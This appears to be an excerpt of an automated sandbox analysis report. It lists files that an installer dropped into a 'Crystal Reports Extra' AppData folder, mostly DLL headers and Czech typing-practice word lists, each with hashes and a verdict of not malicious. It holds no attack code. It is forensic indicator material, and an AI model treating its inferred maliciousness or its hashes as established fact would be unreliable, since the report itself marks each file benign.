                                                          Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......>.f.zz..zz..zz..(...xz..(...qz..(...rz..(...~z..n...yz..s...jz..n...oz..zz..3{..,....z..,...{z..,...{z..,...{z..Richzz..ty......tyN.....ty......Rich............PE..L...u.Ra...........!.....b2..\................2..............................@E......QC...@......................... .?.L...l.?.......A.......................B.TR..`.=.p.....................=......=.@.............2..............................text...Ua2......b2................. ..`.rdata..2{....2..|...f2.............@..@.data.........@.......?.............@....rsrc.........A.......@.............@..@.reloc..TR....B..T...nB.............@..B........................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\libtasn1-6.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):80653
                                                          Entropy (8bit):5.935029812256724
                                                          Encrypted:false
                                                          SSDEEP:1536:K7jqZI3jgg9IJgo+wrcKl8l2gdejHL8jT7x8ZKQi3uh:yUojggfo+wgl2gGHLYXx80T3uh
                                                          MD5:266FA5BAC8FAB45A57B3EB68495334F4
                                                          SHA1:C845B88A5F2279E348886E4D6246F855ACAA85B9
                                                          SHA-256:C8A3B86D6E930B21F428A3CAC3CC8FB432716D16043824DF886731565BFE8A23
                                                          SHA-512:EF8CAEF0A926865D4B1FE0CE51DC9542B814EB76392F85895A042AC514C529426519C83BCEC2EB976848D174D504E2852FA854C06A70D21F4E16DEBD533E3D0A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........2..?.....& .........V.................e....................................;......... ......................................p..6.......(............@.......................0...................... ...(....................................................text............................... .P`.data...`...........................@.P..rdata..@,..........................@.`@/4......5....0......................@.0@.pdata.......@......................@.0@.xdata.......P......................@.0@.bss.........`........................`..edata..6....p......................@.0@.idata..(............ ..............@.0..CRT....X............*..............@.@..tls....h............,..............@.`..reloc..............................@.0B/14..................0..............@.0B........................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\mingwm10.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):7182
                                                          Entropy (8bit):3.851683776363626
                                                          Encrypted:false
                                                          SSDEEP:96:AT0nsNJmBwoCtrOEhXpOITI151ihv2idiG:83KwoCtrOESITI151ihvtp
                                                          MD5:A5A239C980D6791086B7FE0E2CA38974
                                                          SHA1:DBD8E70DB07AC78E007B13CC8AE80C9A3885A592
                                                          SHA-256:FB33C708C2F83C188DC024B65CB620D7E2C3939C155BC1C15DC73DCCEBE256B7
                                                          SHA-512:8667904DDA77C994F646083EF39B1F69C2961758C3DA60CECADFE6D349DD99934C4D8784F8E38AE8B8C9EB9762EDD546F2A7B579F02612578F8049E9D10E8DA7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G..V...........#......................... .....o......................................... ......................`..x....p.......................................................................................................................text...`...........................`.P`.data........ ......................@.0..rdata.......0......................@.0@/4...........@......................@.0@.bss.........P........................@..edata..x....`......................@.0@.idata.......p......................@.0..reloc..............................@.0B................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\pthreadGC2.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):36352
                                                          Entropy (8bit):6.049364088538635
                                                          Encrypted:false
                                                          SSDEEP:384:RHKAwDe/yMw0U0GuOI+KDYZ1EWsLKkSqPmMmg2oes9yzCuFYh3oDqLjBISO0IqMU:RHKAm0UsO76WsxDmELsCDIMiH3YN
                                                          MD5:928C9EEA653311AF8EFC155DA5A1D6A5
                                                          SHA1:27300FCD5C22245573F5595ECBD64FCE89C53750
                                                          SHA-256:6DC4BEE625A2C5E3499E36FE7C6FF8EAD92ADF6AAE40C4099FDC8EF82E85B387
                                                          SHA-512:0541D706BB53F8A04C78FCF327C4557553FA901D645AD2FD446E79753B4729F1E36793F42FBDD9B5E92073A30ED9A3DD853773A06EBEA8E9302ECE91A6C5362C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G..V...........#.....f.........................a.................................Y........ .........................................d............................................................................................................text....e.......f..................`.0`.data................j..............@.0..bss....p.............................0..edata...............l..............@.0@.idata...............|..............@.0..rsrc...d...........................@.0..reloc..............................@.0B........................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\is-DDSCO.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):340
                                                          Entropy (8bit):4.329376027112529
                                                          Encrypted:false
                                                          SSDEEP:6:uCohGf+wnvVEk6ubLCG3jOQU4uDCpN+ODaJ/CMt1lyvYs1vyQ:Ah7qvVR+aOeuDeNNaZ/wvB1vn
                                                          MD5:2E5417F883E221DAD966C8C7851294C2
                                                          SHA1:AB1B82343073A226CD8D12875E2ABAB05249C6A9
                                                          SHA-256:440E0557C735D1AF2DC425C5FB095F3DF4B3A12BB95F65CE04CAD9CCDD5FCA2D
                                                          SHA-512:2E2326391189FC0B98F727A6EAC5211F600C4D9A2BD7A986C696AD6220DC2AB33D28D4AFC2F551D1F68FFC5DFA5C73FAADA067BD13C5333DC3B9B3A9E99E1E7E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: 0|A.0|a.3|B.3|b.2|C.2|c.2|D.2|d.2|E.2|e.3|F.3|f.3|G.3|g.6|H.6|h.7|I.7|i.6|J.6|j.7|K.7|k.8|L.8|l.6|M.6|m.6|N.6|n.8|O.8|o.9|P.9|p.0|Q.0|q.3|R.3|r.1|S.1|s.3|T.3|t.6|U.6|u.3|V.3|v.1|W.1|w.1|X.1|x.6|Z.6|Z.0|Y.0|y.9|!.9|..9|".9|..9|/.9|..5| .0|1.0|+.1|2.1|..1|3.1|..2|4.2|..3|5.3|..3|6.3|..6|7.6|..6|8.6|..7|9.7|..9|0.9|..8|,.0|;.9|..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\is-J58EF.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):61
                                                          Entropy (8bit):4.502287699697848
                                                          Encrypted:false
                                                          SSDEEP:3:U96Q+ALu3LRRDJNtfEFju9m/LJ:UYQ+WGRxEFqWt
                                                          MD5:97C705D1301F982E0010876C8FDA614E
                                                          SHA1:ACDB1D10A6B7AEA47932A100D36A6F9D867C40C1
                                                          SHA-256:DB42C3BC77F54B145D013C395509A5496DA3B5A8D4730C5F593E2835F1F2D7F5
                                                          SHA-512:170CD69F3CF93EB7315390A569D4D03BB9CB1D606D8DE8B63B267BC2E1E8B45E8683BAF929016E0F45840C68A221E0C3B58B7A6A48E89715234E450D5D3F2377
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: theme_font_name=DoulosSILR.ttf.theme_locale_name=cs_CZ.UTF-8.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\keyboard.lst (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):340
                                                          Entropy (8bit):4.329376027112529
                                                          Encrypted:false
                                                          SSDEEP:6:uCohGf+wnvVEk6ubLCG3jOQU4uDCpN+ODaJ/CMt1lyvYs1vyQ:Ah7qvVR+aOeuDeNNaZ/wvB1vn
                                                          MD5:2E5417F883E221DAD966C8C7851294C2
                                                          SHA1:AB1B82343073A226CD8D12875E2ABAB05249C6A9
                                                          SHA-256:440E0557C735D1AF2DC425C5FB095F3DF4B3A12BB95F65CE04CAD9CCDD5FCA2D
                                                          SHA-512:2E2326391189FC0B98F727A6EAC5211F600C4D9A2BD7A986C696AD6220DC2AB33D28D4AFC2F551D1F68FFC5DFA5C73FAADA067BD13C5333DC3B9B3A9E99E1E7E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: 0|A.0|a.3|B.3|b.2|C.2|c.2|D.2|d.2|E.2|e.3|F.3|f.3|G.3|g.6|H.6|h.7|I.7|i.6|J.6|j.7|K.7|k.8|L.8|l.6|M.6|m.6|N.6|n.8|O.8|o.9|P.9|p.0|Q.0|q.3|R.3|r.1|S.1|s.3|T.3|t.6|U.6|u.3|V.3|v.1|W.1|w.1|X.1|x.6|Z.6|Z.0|Y.0|y.9|!.9|..9|".9|..9|/.9|..5| .0|1.0|+.1|2.1|..1|3.1|..2|4.2|..3|5.3|..3|6.3|..6|7.6|..6|8.6|..7|9.7|..9|0.9|..8|,.0|;.9|..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\settings.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):61
                                                          Entropy (8bit):4.502287699697848
                                                          Encrypted:false
                                                          SSDEEP:3:U96Q+ALu3LRRDJNtfEFju9m/LJ:UYQ+WGRxEFqWt
                                                          MD5:97C705D1301F982E0010876C8FDA614E
                                                          SHA1:ACDB1D10A6B7AEA47932A100D36A6F9D867C40C1
                                                          SHA-256:DB42C3BC77F54B145D013C395509A5496DA3B5A8D4730C5F593E2835F1F2D7F5
                                                          SHA-512:170CD69F3CF93EB7315390A569D4D03BB9CB1D606D8DE8B63B267BC2E1E8B45E8683BAF929016E0F45840C68A221E0C3B58B7A6A48E89715234E450D5D3F2377
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: theme_font_name=DoulosSILR.ttf.theme_locale_name=cs_CZ.UTF-8.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\words\abeceda.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):78
                                                          Entropy (8bit):3.899829828948582
                                                          Encrypted:false
                                                          SSDEEP:3:O81Y5qTivtvmfBy7UlWf2vxvwvzv8N+nPyn:ONCilmZiOa2Bw7OKPyn
                                                          MD5:CA1D4315A55A43CE742942BD35034034
                                                          SHA1:5149927E633B4320D00600FDD5A12A367956D49E
                                                          SHA-256:77891560CAC7B7F2ED6AE01E7BFC979EFC1AF6AB686C534F03CFBCAEAB002A3B
                                                          SHA-512:18C88C698B33AC6312BE9ED7EB8D8840605AD33D3AB87650F643E964871EA7171DDD4C69FC121D64548CF5B192BEC5D634A3059DCC876227F7702AF201643823
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Abeceda.A.B.C.D.E.F.G.H.CH.I.J.K.L.M.N.O.P.Q.R.S.T.U.V.W.X.Y.Z...........
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\words\is-60AQ9.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):78
                                                          Entropy (8bit):3.899829828948582
                                                          Encrypted:false
                                                          SSDEEP:3:O81Y5qTivtvmfBy7UlWf2vxvwvzv8N+nPyn:ONCilmZiOa2Bw7OKPyn
                                                          MD5:CA1D4315A55A43CE742942BD35034034
                                                          SHA1:5149927E633B4320D00600FDD5A12A367956D49E
                                                          SHA-256:77891560CAC7B7F2ED6AE01E7BFC979EFC1AF6AB686C534F03CFBCAEAB002A3B
                                                          SHA-512:18C88C698B33AC6312BE9ED7EB8D8840605AD33D3AB87650F643E964871EA7171DDD4C69FC121D64548CF5B192BEC5D634A3059DCC876227F7702AF201643823
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Abeceda.A.B.C.D.E.F.G.H.CH.I.J.K.L.M.N.O.P.Q.R.S.T.U.V.W.X.Y.Z...........
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\words\is-6IOGQ.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):260
                                                          Entropy (8bit):4.444810843100335
                                                          Encrypted:false
                                                          SSDEEP:6:FIGhr9/b0Qy/vnpgWaKkptUWdLWM5FH6sg5HUdvJlkvrpoLSv/c:nX/b0f/vIQMJgCv+2SvE
                                                          MD5:EDBBE4CB460F6E0BD02EEC2116198725
                                                          SHA1:94ED9A1BCDDB42E62B0290093D3ABA073645E5F0
                                                          SHA-256:73E6EC11601E300184A19A15BF2D123E46EE98966B9A49F4AEACE731B941DF13
                                                          SHA-512:1C87B451C2471B5AA99C7829B769B7CCAC358FC85270E134F45CBB0F14CDF4FE7C72DE4A3E1DDDF3838605C69EA4CB9E12EB367CE8BD7372A0D03B8FBABEE9DF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Slova na 3 p.smena.ABY.ACH.ALE.ALT.ANO.B.J.B.L.BAR.BAS.BIL.BUK.B.K.CAR.CHA.C.L.DEJ.DUB.D.L.ESO.EVA.F.N.HAD.H.J.H.K.IVA.J.L.KAT.K.V.KAZ.KDE.KDO.KDY.KEL.LED.LEH.L.K.LEM.LEN.LEP.LES.LET.LEV.MED.NIT.NOC.NOS.OSA.R.J.RAK.S.L.SUP.TRH.TRN.TUK.VEN.VES.ZOB
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\words\is-6M9NV.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):189
                                                          Entropy (8bit):4.354970599038016
                                                          Encrypted:false
                                                          SSDEEP:3:FTExsuIPA5vBUJhJYzn+vuqx8y7MwpK0Dq1vXm10OW28xpKEWMhyQj:FIGvA5gyzQ3ZpKSq1vXC0D2gkEWMv
                                                          MD5:339977CA0C3B1C337D71A31DFA04834F
                                                          SHA1:647A92DC735F8F3E400B859A919A0F1940A6D099
                                                          SHA-256:01C5B4A09727217F99997B5E9E19EE81F26346315426E9781E80D71C2A3ED1C2
                                                          SHA-512:CF2EDD7D15DC92658424D1A4371B87E04A727C53931446488BF5E2CA47B13DB8629F9E65E20EDC38E508F43003D8A18E1EDADA250ADB9D62151D53DB38FE4020
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Slova na 2 p.smena.AD.AP.AU.CO.D..DO.DR.EC.ES.HW.J..JE.JI.KE.KS.KU.KV.M..M..MI.MU.NA.NF.NV.OD.OK.ON.OP.OS.PA.PC.P..PO.SE.SI.SK.ST.SW.TA.T..TI.TJ.TO.TU.TY.UK..L.UM.VE.V..VY.WC.ZA.ZE
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\words\is-C75PA.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):4.567882392336099
                                                          Encrypted:false
                                                          SSDEEP:6:FIGexCy/fnIjb19vCAzTA8Iy47jWfOoOxvwNwEFLB7HxVV3n77:neBm/zE8Iye6fOo8YNpBFL377
                                                          MD5:1E9E1243C3EAE2633D21725160F452F9
                                                          SHA1:CE5FC2CC98D90DF0510A3C928224E3D2DF6062A1
                                                          SHA-256:7EDC11F8A650E4B1BDB28BC352E43D4609C82BBD04A5C1BBD4B10691AE0B114F
                                                          SHA-512:D3DD07851155124656D6EEE8B5FEFC81D6882F6BD3B239AA94FF611B5A28C42DEB7692E5E08D7E149D062982DDDA48E38C9B643FDD137F72153ACC06182A2488
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Slova na 4 p.smena.ALFA.AUTO.BRAK.BRAL.COSI.CUKL.CUKR.D.KY.DR.B.EL.N.EMIL.GONG.HLAD.HLAS.HROB.HROM.KLID.KOP..KR.L.KR.M.KR.M.M.SA.M.TO.NUDA.N.TY.O.ZA.OSEL.P.RA.PRAK.ROSA.ROPA.R.HA.RYT..S.TO.SLZA.SN.H.SVAL.T.TA.T.HA.TRN..TYGR.UCHO.UM.T..TOK.V.HA.VATA.VINA.V.TR.VLNA.VRBA.ZIMA.ZNAK.ZVUK.ZVYK
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\words\is-GHT5L.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):166
                                                          Entropy (8bit):4.755240627854452
                                                          Encrypted:false
                                                          SSDEEP:3:kBpSjxcanNd3uOwgr5UyRvtE58iUKrmN9Gj/DV9xav3L+4yqZvex1Czsvvn:kBpkVnNd3trWOE9UKrmv0rIv3L+9KveB
                                                          MD5:B237FA0E4FDB0C0154545E11AD7BBADE
                                                          SHA1:E35F41A43984FA817F4E239681AA3F1EEA85C64E
                                                          SHA-256:94C63C7BD4828B56A6994C28C70C9BCE6B1A6671354332FEBCCFDDA663367846
                                                          SHA-512:08EBBE90FBDC4B71776A27527831FC22D5ABBADD81AB4859F4BFCDBB09FB4636371C0E5EB933E382BD97D04B1F7E0A422C53ADB2E24C4A6F9F14287D6F7FC202
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Prstov. cvi.en..FTC.TFC.ASFD.SAFD.JKL.KIK.WSX.SXW.DEC.DCE.ECD.UIOP.POIU.HYN.NHY.NYH.GTB.BGT.VCXZ.ZXCV.FVR.RFV.FVR.SWX.WXS.JUJ.RFR..UK.O.O.FT....U.PL...P...
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\words\is-R0110.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):357
                                                          Entropy (8bit):4.536715192123414
                                                          Encrypted:false
                                                          SSDEEP:6:FIGwAwkocsn7xUgspqOfgkUkYtBw/Z38g5IpNdlgvfS1qril1kvwptRvVRpvx6gP:n1w2G7xUgsVgkUkYzwh82IpNdlgva1qS
                                                          MD5:22177D7D3C82010C035445E0E9C28555
                                                          SHA1:C6C47D95424FD007CA7CA2C6307CA53874BC158F
                                                          SHA-256:4158F01679D9EDEBF87334751870106E227C121655061A63B2F41B2721C1F340
                                                          SHA-512:9E3F04ECD63162EC0DFAA8A2C933E61223FB63882729E72F266536E731D04118428F6B61A26BDC6C52BF8EAFC871AC132E579352AF5717E05AF100696DD7E600
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Slova na 5 p.smen.AD.LA.ALICE.AR.NA.BABKA.BAHNO.BAL.K.BIBLE.BL.TO.BOMBA.BAL.K.BAN.K.BATOH.CELER.CHATA.D.RCE.CHL.B.DCERA.D.VKA.FACKA.GEKON.GYMPL.H.DKA.HLAVA.HOLKA.HRNEC.J.TRA.JEN.K.J.DLO.KAB.T.KABEL.KAPKA.KOZ.K.KR.VA.L.VKA.L.HEV.L.SKA.MAMKA.MOTOR.MOT.L.OBJEV.OKOUN.RADEK.S.DLO.SOD.K.TATRA.TUL.K.UBRUS..PICE.VOD.K.V.FUK.Z.PAD.ZLATO
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\words\is-TL1FL.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):231
                                                          Entropy (8bit):4.47020612224286
                                                          Encrypted:false
                                                          SSDEEP:6:zJ9jqyYngl3Mkf9LNKtjsCA6ukyVqF+M2W1Sg93z:PqMuq9LNJLFkyVqF+MzLl
                                                          MD5:F59629E4FE79FC69680066BC6A48F0AA
                                                          SHA1:D39D19BD3A9359C17D02E8001D11A9DFBDAFA361
                                                          SHA-256:AC129A9634FE2722A065F706992E09D36F12429DE39138DA4CBF8AB1E09C7583
                                                          SHA-512:7BDE36DC4B195950351D4B34CE12414F4C70220CDD3F5B471902C29A0AC15AC59C3E553985BA95EE26E32A26D6DDEBD08707E8625218C6AC220B94F6C03B6315
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Rostliny.AK.T.TULIP.N.LILIE.KOSATEC.DUB.BUK.BOROVICE.JASM.N.LEKN.N.JASAN.BAZALKA.M.TA.J.ROVEC.JITROCEL.L.KOVEC.NARCIS.BLEDULE.P.R.SMRK.JEDLE.MALIN.K.VRBOVKA.OVES.KALINA.BEGONIE.KAKTUS.ZEL..KOPR.KAPUSTA.KOSTIVAL.N.PRSN.K
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\words\prsty.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):166
                                                          Entropy (8bit):4.755240627854452
                                                          Encrypted:false
                                                          SSDEEP:3:kBpSjxcanNd3uOwgr5UyRvtE58iUKrmN9Gj/DV9xav3L+4yqZvex1Czsvvn:kBpkVnNd3trWOE9UKrmv0rIv3L+9KveB
                                                          MD5:B237FA0E4FDB0C0154545E11AD7BBADE
                                                          SHA1:E35F41A43984FA817F4E239681AA3F1EEA85C64E
                                                          SHA-256:94C63C7BD4828B56A6994C28C70C9BCE6B1A6671354332FEBCCFDDA663367846
                                                          SHA-512:08EBBE90FBDC4B71776A27527831FC22D5ABBADD81AB4859F4BFCDBB09FB4636371C0E5EB933E382BD97D04B1F7E0A422C53ADB2E24C4A6F9F14287D6F7FC202
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Prstov. cvi.en..FTC.TFC.ASFD.SAFD.JKL.KIK.WSX.SXW.DEC.DCE.ECD.UIOP.POIU.HYN.NHY.NYH.GTB.BGT.VCXZ.ZXCV.FVR.RFV.FVR.SWX.WXS.JUJ.RFR..UK.O.O.FT....U.PL...P...
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\words\rostliny.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):231
                                                          Entropy (8bit):4.47020612224286
                                                          Encrypted:false
                                                          SSDEEP:6:zJ9jqyYngl3Mkf9LNKtjsCA6ukyVqF+M2W1Sg93z:PqMuq9LNJLFkyVqF+MzLl
                                                          MD5:F59629E4FE79FC69680066BC6A48F0AA
                                                          SHA1:D39D19BD3A9359C17D02E8001D11A9DFBDAFA361
                                                          SHA-256:AC129A9634FE2722A065F706992E09D36F12429DE39138DA4CBF8AB1E09C7583
                                                          SHA-512:7BDE36DC4B195950351D4B34CE12414F4C70220CDD3F5B471902C29A0AC15AC59C3E553985BA95EE26E32A26D6DDEBD08707E8625218C6AC220B94F6C03B6315
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Rostliny.AK.T.TULIP.N.LILIE.KOSATEC.DUB.BUK.BOROVICE.JASM.N.LEKN.N.JASAN.BAZALKA.M.TA.J.ROVEC.JITROCEL.L.KOVEC.NARCIS.BLEDULE.P.R.SMRK.JEDLE.MALIN.K.VRBOVKA.OVES.KALINA.BEGONIE.KAKTUS.ZEL..KOPR.KAPUSTA.KOSTIVAL.N.PRSN.K
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\words\slova2.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):189
                                                          Entropy (8bit):4.354970599038016
                                                          Encrypted:false
                                                          SSDEEP:3:FTExsuIPA5vBUJhJYzn+vuqx8y7MwpK0Dq1vXm10OW28xpKEWMhyQj:FIGvA5gyzQ3ZpKSq1vXC0D2gkEWMv
                                                          MD5:339977CA0C3B1C337D71A31DFA04834F
                                                          SHA1:647A92DC735F8F3E400B859A919A0F1940A6D099
                                                          SHA-256:01C5B4A09727217F99997B5E9E19EE81F26346315426E9781E80D71C2A3ED1C2
                                                          SHA-512:CF2EDD7D15DC92658424D1A4371B87E04A727C53931446488BF5E2CA47B13DB8629F9E65E20EDC38E508F43003D8A18E1EDADA250ADB9D62151D53DB38FE4020
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Slova na 2 p.smena.AD.AP.AU.CO.D..DO.DR.EC.ES.HW.J..JE.JI.KE.KS.KU.KV.M..M..MI.MU.NA.NF.NV.OD.OK.ON.OP.OS.PA.PC.P..PO.SE.SI.SK.ST.SW.TA.T..TI.TJ.TO.TU.TY.UK..L.UM.VE.V..VY.WC.ZA.ZE
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\words\slova3.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):260
                                                          Entropy (8bit):4.444810843100335
                                                          Encrypted:false
                                                          SSDEEP:6:FIGhr9/b0Qy/vnpgWaKkptUWdLWM5FH6sg5HUdvJlkvrpoLSv/c:nX/b0f/vIQMJgCv+2SvE
                                                          MD5:EDBBE4CB460F6E0BD02EEC2116198725
                                                          SHA1:94ED9A1BCDDB42E62B0290093D3ABA073645E5F0
                                                          SHA-256:73E6EC11601E300184A19A15BF2D123E46EE98966B9A49F4AEACE731B941DF13
                                                          SHA-512:1C87B451C2471B5AA99C7829B769B7CCAC358FC85270E134F45CBB0F14CDF4FE7C72DE4A3E1DDDF3838605C69EA4CB9E12EB367CE8BD7372A0D03B8FBABEE9DF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Slova na 3 p.smena.ABY.ACH.ALE.ALT.ANO.B.J.B.L.BAR.BAS.BIL.BUK.B.K.CAR.CHA.C.L.DEJ.DUB.D.L.ESO.EVA.F.N.HAD.H.J.H.K.IVA.J.L.KAT.K.V.KAZ.KDE.KDO.KDY.KEL.LED.LEH.L.K.LEM.LEN.LEP.LES.LET.LEV.MED.NIT.NOC.NOS.OSA.R.J.RAK.S.L.SUP.TRH.TRN.TUK.VEN.VES.ZOB
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\words\slova4.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):4.567882392336099
                                                          Encrypted:false
                                                          SSDEEP:6:FIGexCy/fnIjb19vCAzTA8Iy47jWfOoOxvwNwEFLB7HxVV3n77:neBm/zE8Iye6fOo8YNpBFL377
                                                          MD5:1E9E1243C3EAE2633D21725160F452F9
                                                          SHA1:CE5FC2CC98D90DF0510A3C928224E3D2DF6062A1
                                                          SHA-256:7EDC11F8A650E4B1BDB28BC352E43D4609C82BBD04A5C1BBD4B10691AE0B114F
                                                          SHA-512:D3DD07851155124656D6EEE8B5FEFC81D6882F6BD3B239AA94FF611B5A28C42DEB7692E5E08D7E149D062982DDDA48E38C9B643FDD137F72153ACC06182A2488
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Slova na 4 p.smena.ALFA.AUTO.BRAK.BRAL.COSI.CUKL.CUKR.D.KY.DR.B.EL.N.EMIL.GONG.HLAD.HLAS.HROB.HROM.KLID.KOP..KR.L.KR.M.KR.M.M.SA.M.TO.NUDA.N.TY.O.ZA.OSEL.P.RA.PRAK.ROSA.ROPA.R.HA.RYT..S.TO.SLZA.SN.H.SVAL.T.TA.T.HA.TRN..TYGR.UCHO.UM.T..TOK.V.HA.VATA.VINA.V.TR.VLNA.VRBA.ZIMA.ZNAK.ZVUK.ZVYK
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\words\slova5.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):357
                                                          Entropy (8bit):4.536715192123414
                                                          Encrypted:false
                                                          SSDEEP:6:FIGwAwkocsn7xUgspqOfgkUkYtBw/Z38g5IpNdlgvfS1qril1kvwptRvVRpvx6gP:n1w2G7xUgsVgkUkYzwh82IpNdlgva1qS
                                                          MD5:22177D7D3C82010C035445E0E9C28555
                                                          SHA1:C6C47D95424FD007CA7CA2C6307CA53874BC158F
                                                          SHA-256:4158F01679D9EDEBF87334751870106E227C121655061A63B2F41B2721C1F340
